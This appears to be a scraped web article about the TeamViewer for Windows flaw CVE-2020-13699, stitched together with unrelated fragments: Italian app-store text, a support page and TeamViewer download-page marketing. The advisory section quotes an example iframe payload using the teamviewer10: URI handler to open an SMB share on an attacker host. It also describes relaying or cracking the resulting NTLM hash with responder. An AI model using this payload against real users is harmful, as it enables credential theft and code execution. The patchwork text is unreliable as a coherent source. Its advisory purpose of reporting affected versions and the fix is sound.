A high-risk vulnerability (CVE-2020-13699) in TeamViewer for Windows could be exploited by remote attackers to crack users’ password and, consequently, lead to further system exploitation.
About TeamViewer
TeamViewer is an application developed by German company TeamViewer GmbH and is available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 and BlackBerry operating systems.
TeamViewer consente di controllare i computer dal tuo Chromebook o dal browser Chrome in modo semplice, veloce e sicuro, proprio come se fossi seduto davanti al PC remoto. Fornisci assistenza tramite Chrome o accedi al PC dell'ufficio. Caratteristiche - Accesso e connessione a computer & contatti - Connessione ad altri dispositivi tramite ID e. Unlike other online meeting tools, TeamViewer Meeting provides a GDPR and HIPAA compliant platform with RSA 4096 public/private key exchange and 256-bit end-to-end encrypted videoconference calls, designed to protect sensitive, highly confidential information. Lock meetings and add meeting passwords to keep uninvited guests out of private.
Online Support ca n remotely access your computer using the secure TeamViewer platform. Ju st select th e type of computer you are using below to get started: Windows Mac On ce you have installed the TeamViewer QS program using one of the links above , please call Online Support at 800-282- 7972 to.
It is used primarily for remote access to and control of various types of computer systems and mobile devices, but also offers collaboration and presentation features (e.g., desktop sharing, web conferencing, file transfer, etc.)
This article applies to all TeamViewer licenses. General By assigning a device to a TeamViewer account, the device can be remotely managed and monitored by the account at any time. Remotely monitoring a device gives you the ability to check for common issues like outdated antivirus protection, a disabled firewall, missing. TeamViewer allows you to connect to their device in real time with full video and audio to troubleshoot problems and get them back online quickly. “My computer is running much faster now that my son was able to take a look at it, even though he’s in Canada.”.
Since the advent of COVID-19, enterprise use of the software has increased due to many employees being forced to work from home.
About the vulnerability (CVE-2020-13699)
CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.
“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play attacker-IPsharefake.tvs'
) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.
“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
As noted before, exploitation of the flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks.
There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.
CIS assesses that the risk of exploitation is high for large and medium government and business entities, medium for small government and business entities, and low for home users.
According to the company, the vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. Users are advised to upgrade to version 15.8.3 to close the hole.
- Establish incoming and outgoing connections between devices
- Real-time remote access and support
- Collaborate online, participate in meetings, and chat with others
Buy a license in order to use even more TeamViewer features
Check out additional TeamViewer remote desktop support and collaboration downloads
Immediate assistance:
TeamViewer QuickSupport
Optimized for instant remote desktop support, this small customer module does not require installation or administrator rights — simply download, double click, and give the provided ID and password to your supporter.
Unattended access:
TeamViewer Host
TeamViewer Host is used for 24/7 access to remote computers, which makes it an ideal solution for uses such as remote monitoring, server maintenance, or connecting to a PC or Mac in the office or at home. Install TeamViewer Host on an unlimited number of computers and devices. As a licensed user, you have access to them all!
Join or Start a Meeting:
TeamViewer Meeting
TeamViewer Meeting installs on your desktop all the essential meeting tools you need to communicate better with your teams and clients, from anywhere, any time.
TeamViewer MSI Package
TeamViewer MSI is an alternative installation package for the full version of TeamViewer or for TeamViewer Host. TeamViewer MSI is used to deploy TeamViewer via Group Policy (GPO) in an Active Directory domain.
Please note: TeamViewer MSI is only available with a Corporate license.
TeamViewer Portable
Teamviewer Online App
TeamViewer Portable generally comprises all the features of the full version of TeamViewer without the need to install anything. Instead, TeamViewer Portable runs directly from a USB stick or the Cloud — TeamViewer Portable is the perfect solution when you are on the road and using different computers.
Other Resources
Looking for an older TeamViewer version or want to learn more about our supported operating systems?
Teamviewer Online Access
See previous versions
Supported operating systems
Changelog